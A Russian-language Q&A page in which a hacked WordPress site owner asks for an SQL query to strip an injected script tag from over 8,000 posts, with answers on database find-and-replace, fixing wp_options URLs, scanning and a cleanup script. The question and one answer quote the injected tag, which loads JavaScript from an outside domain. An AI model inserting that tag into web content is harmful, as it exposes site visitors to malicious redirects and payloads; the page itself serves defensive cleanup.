Сайт Wordpress взломали, мне нужен запрос на удаление скрипта между кодом - PullRequest
2 голосов
/ 12 июля 2020

Я использую веб-сайт WordPress. Мой веб-сайт взломали, и я получил код сценария ниже во всех сообщениях запрос на удаление этого кода Я попробовал приведенный ниже код, но он не работает. У меня нет затронутых строк.

Update wp_posts set post_content = replace(post_content, "<script src=‘https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>", "") where post_content like "%<script src=‘https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>%"

У меня более 8k записей, и я использую однострочное значение. Проверьте в конце кода, что я получил скрипт.

[vc_row css=".vc_custom_1553586206091{padding-top: 50px !important;padding-bottom: 50px !important;background-image: url(https://www.mysite.in/wp-content/uploads/2019/03/1161465.jpg?id=74) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}" el_class="red-overlay"][vc_column][vc_custom_heading text="" font_container="tag:h2|font_size:50px|text_align:center|color:%23ffffff" use_theme_fonts="yes" el_class="extrabold" css=".vc_custom_1553586443111{margin-bottom: 0px !important;padding-bottom: 0px !important;}"][vc_column_text el_class="banner_para"]
[/vc_column_text][vc_wp_search el_id="bannerSearch"][/vc_column][/vc_row][vc_row full_width="stretch_row_content" css=".vc_custom_1553588147048{padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;background-image: url(https://www.mysite.in/wp-content/uploads/2019/03/asd?id=74) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}"][vc_column width="8/12" el_class="red-overlay"][/vc_column][vc_column width="4/12"][/vc_column][/vc_row]<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>

Ответы [ 4 ]

0 голосов
/ 19 июля 2020

Я анализировал эту вредоносную программу несколько недель, и go она очень инвазивна, она может заразить все файлы js, php, html и все статьи в базе данных вашего WordPress. В некоторых случаях home_url и site_url вашего веб-сайта заменяются доменом вредоносной программы, вызывающим перенаправления.

Таким образом, как правило, заражено более 2000 файлов, очень сложно очистить все это вручную, и если вы забыли один файл, все файлы снова заражены ..

Но, к счастью, я сделал сценарий, который легко обнаруживает и исправляет зараженные файлы и базу данных:

https://github.com/Guiomuh/WP_Redirect_Botnet_Cleaner

0 голосов
/ 13 июля 2020

Я экспортировал базу данных (затронутые таблицы) в файл, использовал notepad ++, чтобы "найти и заменить" ее. Удалил таблицу из базы данных и повторно импортировал таблицу wp_posts

Это затронутые таблицы: wp_options (siteurl и home) wp_posts в нескольких местах (в моем случае заменяет 2086)

Надежда вы получите это исправлено

0 голосов
/ 16 июля 2020

В моем случае и бэкэнд, и интерфейс не работали. Итак, сначала я исправил свой бэкэнд, изменив URL-адрес сайта в wp-options. Затем я использовал плагин безопасности WordFence для сканирования зараженных файлов. Удалил зараженные файлы и теперь с сайтом все в порядке. введите описание изображения здесь

0 голосов
/ 13 июля 2020

Возникла та же проблема, в настоящее время я заменил URL-адрес в поле sr c на плагин «URL-адреса обновления Velvet Blues», поэтому файл JavaScript не может работать.

<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>

сейчас

<script src='#' type=text/javascript></script>

Я знаю, что это не лучший вариант, но он дает мне время найти лучшее решение и копнуть глубже.

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...